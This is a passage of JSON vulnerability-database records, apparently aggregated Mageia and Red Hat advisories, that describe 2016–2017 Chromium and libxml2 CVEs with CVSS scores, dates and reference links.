(CVE-2016-1709) The ChromeClientImpl::createWindow method in WebKit/Source/web/ChromeClientImpl.cpp in Blink, as used in Chromium before 52.0.2743.82, does not prevent window creation by a deferred frame, which allows remote attackers to bypass the Same Origin Policy via a crafted web site. (CVE-2016-1710) WebKit/Source/core/loader/FrameLoader.cpp in Blink, as used in Chromium before 52.0.2743.82, does not disable frame navigation during a detach operation on a DocumentLoader object, which allows remote attackers to bypass the Same Origin Policy via a crafted web site. 
(CVE-2016-1711) Use-after-free vulnerability in WebKit/Source/core/editing/VisibleUnits.cpp in Blink, as used in Chromium before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted JavaScript code involving an @import at-rule in a Cascading Style Sheets (CSS) token sequence in conjunction with a rel=import attribute of a LINK element. (CVE-2016-5127) objects.cc in V8 before 5.2.361.27, as used in Chromium before 52.0.2743.82, does not prevent API interceptors from modifying a store target without setting a property, which allows remote attackers to bypass the Same Origin Policy via a crafted web site. (CVE-2016-5128) V8 before 5.2.361.32, as used in Chromium before 52.0.2743.82, does not properly process left-trimmed objects, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code. (CVE-2016-5129) content/renderer/history_controller.cc in Chromium before 52.0.2743.82 does not properly restrict multiple uses of a JavaScript forward method, which allows remote attackers to spoof the URL display via a crafted web site. (CVE-2016-5130) The Service Workers subsystem in Chromium before 52.0.2743.82 does not properly implement the Secure Contexts specification during decisions about whether to control a subframe, which allows remote attackers to bypass the Same Origin Policy via an https IFRAME element inside an http IFRAME element. (CVE-2016-5132) Chromium before 52.0.2743.82 mishandles origin information during proxy authentication, which allows man-in-the-middle attackers to spoof a proxy-authentication login prompt or trigger incorrect credential storage by modifying the client-server data stream. 
(CVE-2016-5133) net/proxy/proxy_service.cc in the Proxy Auto-Config (PAC) feature in Chromium before 52.0.2743.82 does not ensure that URL information is restricted to a scheme, host, and port, which allows remote attackers to discover credentials by operating a server with a PAC script, a related issue to CVE-2016-3763. (CVE-2016-5134) WebKit/Source/core/html/parser/HTMLPreloadScanner.cpp in Blink, as used in Chromium before 52.0.2743.82, does not consider referrer-policy information inside an HTML document during a preload request, which allows remote attackers to bypass the Content Security Policy (CSP) protection mechanism via a crafted web site, as demonstrated by a \"Content-Security-Policy: referrer origin-when-cross-origin\" header that overrides a \"\" element. (CVE-2016-5135) Use-after-free vulnerability in extensions/renderer/user_script_injector.cc in the Extensions subsystem in Chromium before 52.0.2743.82 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to script deletion. (CVE-2016-5136) The CSPSource::schemeMatches function in WebKit/Source/core/frame/csp/CSPSource.cpp in the Content Security Policy (CSP) implementation in Blink, as used in Chromium before 52.0.2743.82, does not apply http :80 policies to https :443 URLs and does not apply ws :80 policies to wss :443 URLs, which makes it easier for remote attackers to determine whether a specific HSTS web site has been visited by reading a CSP report. NOTE: this vulnerability is associated with a specification change after CVE-2016-1617 resolution. 
(CVE-2016-5137) \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2016-08-03T10:57:01", "type": "mageia", "title": "Updated chromium-browser-stable packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1617", "CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-3763", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2016-08-03T10:57:01", "id": "MGASA-2016-0274", "href": "https://advisories.mageia.org/MGASA-2016-0274.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T16:28:09", "description": "Use-after-free error could lead to crash (CVE-2016-4658). Use-after-free vulnerability in libxml2 through 2.9.4 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function (CVE-2016-5131). 
libxml2 2.9.4 and earlier does not offer a flag directly indicating that the current document may be read but other files may not be opened, which makes it easier for remote attackers to conduct XML External Entity (XXE) attacks via a crafted document (CVE-2016-9318). Heap buffer overflow in xmlAddID (CVE-2017-0663). Integer overflow in memory debug code in libxml2 before 2.9.5 (CVE-2017-5130). NULL pointer deref in xmlDumpElementContent (CVE-2017-5969). Prevent unwanted external entity reference (CVE-2017-7375). Increase buffer space for port in HTTP redirect support (CVE-2017-7376). The function xmlSnprintfElementContent in valid.c was vulnerable to a stack buffer overflow (CVE-2017-9047, CVE-2017-9048). The function xmlDictComputeFastKey in dict.c was vulnerable to a heap-based buffer over-read (CVE-2017-9049). The function xmlDictAddString was vulnerable to a heap-based buffer over-read (CVE-2017-9050). It was discovered that libxml2 incorrectly handled certain files. An attacker could use this issue with specially constructed XML data to cause libxml2 to consume resources, leading to a denial of service (CVE-2017-15412). Wei Lei discovered that libxml2 incorrectly handled certain parameter entities. An attacker could use this issue with specially constructed XML data to cause libxml2 to consume resources, leading to a denial of service (CVE-2017-16932). The libxml2 package has been updated to version 2.9.7 to fix these issues and several other bugs. 
\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-03T15:50:51", "type": "mageia", "title": "Updated libxml2 & perl-XML-LibXML packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4658", "CVE-2016-5131", "CVE-2016-9318", "CVE-2017-0663", "CVE-2017-15412", "CVE-2017-16932", "CVE-2017-5130", "CVE-2017-5969", "CVE-2017-7375", "CVE-2017-7376", "CVE-2017-9047", "CVE-2017-9048", "CVE-2017-9049", "CVE-2017-9050"], "modified": "2018-01-03T15:50:51", "id": "MGASA-2018-0048", "href": "https://advisories.mageia.org/MGASA-2018-0048.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2021-09-02T22:53:46", "description": "Use-after-free vulnerability in extensions/renderer/user_script_injector.cc in the Extensions subsystem in Google Chrome before 52.0.2743.82 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to script deletion.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:19:31", "type": "redhatcve", "title": "CVE-2016-5136", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5136"], "modified": "2020-08-18T08:30:41", "id": "RH:CVE-2016-5136", "href": "https://access.redhat.com/security/cve/cve-2016-5136", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-03T01:51:13", "description": "ios/web/web_state/ui/crw_web_controller.mm in Google Chrome before 52.0.2743.82 on iOS does not ensure that an invalid URL is replaced with the about:blank URL, which allows remote attackers to spoof the URL display via a crafted web site.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-07-21T08:19:57", "type": "redhatcve", "title": "CVE-2016-1707", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", 
"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1707"], "modified": "2019-12-03T03:47:58", "id": "RH:CVE-2016-1707", "href": "https://access.redhat.com/security/cve/cve-2016-1707", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-02T22:53:46", "description": "The Service Workers subsystem in Google Chrome before 52.0.2743.82 does not properly implement the Secure Contexts specification during decisions about whether to control a subframe, which allows remote attackers to bypass the Same Origin Policy via an https IFRAME element inside an http IFRAME element.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:19:11", "type": "redhatcve", "title": "CVE-2016-5132", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5132"], "modified": "2020-08-18T08:30:34", "id": "RH:CVE-2016-5132", "href": "https://access.redhat.com/security/cve/cve-2016-5132", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-02T22:53:46", "description": "The PPAPI implementation in Google Chrome before 52.0.2743.82 does not validate the origin of IPC messages to the plugin broker process that should have come from the browser process, which allows remote attackers to bypass a sandbox protection mechanism via an unexpected message type, related to broker_process_dispatcher.cc, ppapi_plugin_process_host.cc, ppapi_thread.cc, and render_frame_message_filter.cc.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 6.0}, "published": "2016-07-21T08:19:52", "type": "redhatcve", "title": "CVE-2016-1706", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1706"], "modified": "2020-08-18T08:27:45", "id": "RH:CVE-2016-1706", "href": "https://access.redhat.com/security/cve/cve-2016-1706", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-03T10:52:44", 
"description": "objects.cc in Google V8 before 5.2.361.27, as used in Google Chrome before 52.0.2743.82, does not prevent API interceptors from modifying a store target without setting a property, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:18:30", "type": "redhatcve", "title": "CVE-2016-5128", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5128"], "modified": "2020-08-18T08:30:16", "id": "RH:CVE-2016-5128", "href": "https://access.redhat.com/security/cve/cve-2016-5128", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-03T01:51:13", "description": "Google Chrome before 52.0.2743.82 mishandles origin information during proxy authentication, which allows man-in-the-middle attackers to spoof a proxy-authentication login prompt or trigger incorrect credential storage by modifying the client-server data stream.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-07-21T08:19:05", "type": "redhatcve", "title": "CVE-2016-5133", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5133"], "modified": "2020-08-18T08:30:36", "id": "RH:CVE-2016-5133", "href": "https://access.redhat.com/security/cve/cve-2016-5133", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-02T22:53:46", "description": "The Chrome Web Store inline-installation implementation in the Extensions subsystem in Google Chrome before 52.0.2743.82 does not properly consider object lifetimes during progress observation, which allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via a crafted web site.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:19:38", "type": "redhatcve", "title": "CVE-2016-1708", "bulletinFamily": "info", 
"cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1708"], "modified": "2020-08-18T08:27:47", "id": "RH:CVE-2016-1708", "href": "https://access.redhat.com/security/cve/cve-2016-1708", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-02T22:53:45", "description": "Heap-based buffer overflow in the ByteArray::Get method in data/byte_array.cc in Google sfntly before 2016-06-10, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted SFNT font.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:19:42", "type": "redhatcve", "title": "CVE-2016-1709", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1709"], "modified": "2020-08-18T08:27:48", "id": "RH:CVE-2016-1709", "href": "https://access.redhat.com/security/cve/cve-2016-1709", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-02T22:53:45", "description": "Google V8 before 5.2.361.32, as used in Google Chrome before 52.0.2743.82, does not properly process left-trimmed objects, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:18:35", "type": "redhatcve", "title": "CVE-2016-5129", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5129"], "modified": "2020-08-18T08:30:21", "id": "RH:CVE-2016-5129", "href": "https://access.redhat.com/security/cve/cve-2016-5129", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-03T01:51:12", "description": "The ChromeClientImpl::createWindow method in WebKit/Source/web/ChromeClientImpl.cpp in Blink, as used in Google 
Chrome before 52.0.2743.82, does not prevent window creation by a deferred frame, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:18:50", "type": "redhatcve", "title": "CVE-2016-1710", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1710"], "modified": "2020-08-18T08:27:51", "id": "RH:CVE-2016-1710", "href": "https://access.redhat.com/security/cve/cve-2016-1710", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-02T22:53:44", "description": "content/renderer/history_controller.cc in Google Chrome before 52.0.2743.82 does not properly restrict multiple uses of a JavaScript forward method, which allows remote attackers to spoof the URL display via a crafted web site.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-07-21T08:18:59", "type": "redhatcve", "title": "CVE-2016-5130", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5130"], "modified": "2020-08-18T08:30:21", "id": "RH:CVE-2016-5130", "href": "https://access.redhat.com/security/cve/cve-2016-5130", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-02T22:53:46", "description": "WebKit/Source/core/html/parser/HTMLPreloadScanner.cpp in Blink, as used in Google Chrome before 52.0.2743.82, does not consider referrer-policy information inside an HTML document during a preload request, which allows remote attackers to bypass the Content Security Policy (CSP) protection mechanism via a crafted web site, as demonstrated by a \"Content-Security-Policy: referrer origin-when-cross-origin\" header that overrides a \"\" element.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-07-21T08:19:16", "type": "redhatcve", "title": "CVE-2016-5135", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", 
"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5135"], "modified": "2020-08-18T08:30:40", "id": "RH:CVE-2016-5135", "href": "https://access.redhat.com/security/cve/cve-2016-5135", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-03T04:42:43", "description": "WebKit/Source/core/loader/FrameLoader.cpp in Blink, as used in Google Chrome before 52.0.2743.82, does not disable frame navigation during a detach operation on a DocumentLoader object, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:18:44", "type": "redhatcve", "title": "CVE-2016-1711", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2016-1711"], "modified": "2020-08-18T08:27:56", "id": "RH:CVE-2016-1711", "href": "https://access.redhat.com/security/cve/cve-2016-1711", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-02T22:53:45", "description": "Use-after-free vulnerability in WebKit/Source/core/editing/VisibleUnits.cpp in Blink, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted JavaScript code involving an @import at-rule in a Cascading Style Sheets (CSS) token sequence in conjunction with a rel=import attribute of a LINK element.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:18:40", "type": "redhatcve", "title": "CVE-2016-5127", "bulletinFamily": "info", 